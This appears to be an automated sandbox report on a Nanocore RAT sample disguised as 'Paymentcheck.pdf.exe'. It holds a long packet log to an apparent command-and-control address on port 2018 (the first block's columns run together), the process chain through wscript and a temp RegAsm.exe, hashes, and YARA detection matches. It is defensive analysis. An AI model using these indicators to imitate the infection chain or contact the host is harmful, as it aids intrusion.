                              Aug 3, 2021 08:28:00.322813988 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323009968 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.323153019 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323381901 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323640108 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.324127913 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.324333906 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.324462891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.325102091 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333233118 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333378077 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.333518982 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333941936 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.334187984 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.343494892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.343713045 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.343935013 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.344033003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.344240904 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345022917 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345330954 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345601082 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.347243071 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.359194040 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.360997915 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361243010 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361682892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361763000 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.361788034 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.362083912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.363101006 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.363284111 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.364196062 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.364422083 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365171909 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365525007 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365586042 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.365605116 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.366146088 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.369277000 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.370457888 CEST201849771217.138.212.57192.168.2.4
                              Timestamp                          Source Port  Dest Port  Source IP        Dest IP
                              Aug 3, 2021 08:28:00.370803118 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.370865107 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.370888948 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.371766090 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.372165918 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.372410059 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.372505903 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.373164892 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.374231100 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.374438047 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.374489069 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.374502897 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.375010014 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.376132965 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.376422882 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.377398968 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.377908945 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.379079103 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.379935026 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.380004883 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.380022049 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.380109072 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.380466938 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.383538008 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.389175892 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.389766932 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.390052080 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.390202999 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.411253929 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.411354065 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.926240921 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.926450968 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.927108049 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.927151918 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.929187059 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.929478884 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.935204983 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.944274902 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.944665909 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.945501089 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.945722103 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.945828915 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.946106911 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.946381092 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.946481943 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.947309017 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.948668003 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.948877096 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.948892117 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.949162006 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.949263096 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.949559927 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.950160027 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.950283051 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.950417042 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.951085091 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.951242924 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.956242085 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.959268093 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.959892035 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.960401058 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.960638046 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.961616993 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.974169016 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.975110054 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.975406885 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.975461960 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.976315975 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.977108002 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.978127956 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.978244066 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.978545904 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.978698015 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.979306936 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.979413986 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.980314016 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.980417013 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.980585098 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.984239101 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.985224962 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.985322952 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.985382080 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.986145020 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.986228943 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.990124941 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.990453959 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.991100073 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.991458893 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.992136002 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.992185116 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.992486000 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.993657112 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.993716955 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.994132042 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.995059967 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.995451927 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.996053934 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:00.996153116 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:00.996171951 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:01.059931993 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:01.700494051 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:05.032421112 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:05.044286966 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:05.691235065 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:05.900218964 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:05.948393106 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:06.544205904 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:06.590967894 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:07.547663927 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:08.216505051 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:09.599663973 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:10.046778917 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:10.049717903 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:10.296256065 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:10.712364912 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:10.761288881 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:11.369467020 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:11.417753935 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:11.681647062 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:12.070353031 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:12.071213007 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:12.494294882 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:12.495265961 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:13.174438953 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:13.176184893 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:13.877274990 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:14.848794937 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:15.047900915 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:15.090204954 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:15.484452009 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:17.828206062 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:18.575824022 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:18.651921988 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:18.700380087 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:19.330172062 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:19.330291033 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:20.061678886 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:20.106751919 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:20.767349958 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:20.767898083 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:22.935170889 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:23.707376003 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:25.069304943 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:25.121841908 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:25.764211893 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:25.764292955 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:26.713725090 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:26.763310909 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:27.393297911 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:27.393404007 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:28.761111975 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:29.465604067 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:30.066904068 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:30.122335911 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:30.755209923 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:30.755578041 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:34.782016993 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:34.826241016 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:35.046123028 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:35.449649096 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:35.449847937 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:35.902803898 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:35.903351068 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:36.118191004 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:40.089170933 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:40.138752937 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:40.788785934 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:41.061777115 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:41.061896086 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:41.643378019 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:41.644279957 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:42.124553919 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:42.164846897 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:42.719279051 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:42.856383085 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:42.904690027 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:45.097951889 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:45.198671103 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:45.829430103 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:45.847306967 CEST  2018         49771      217.138.212.57   192.168.2.4
                              Aug 3, 2021 08:28:45.847443104 CEST  49771        2018       192.168.2.4      217.138.212.57
                              Aug 3, 2021 08:28:46.728147984 CEST  2018         49771      217.138.212.57   192.168.2.4

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Memory Usage

                              High Level Behavior Distribution

                              Behavior

                              System Behavior

                              General

                              Start time:08:26:26
                              Start date:03/08/2021
                              Path:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
                              Imagebase:0x660000
                              File size:486400 bytes
                              MD5 hash:B7E3C3C9735D6BA37616D791171FE2DB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Reputation:low

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
                              Imagebase:0xc40000
                              File size:147456 bytes
                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Imagebase:0x4a0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, Author: Joe Security
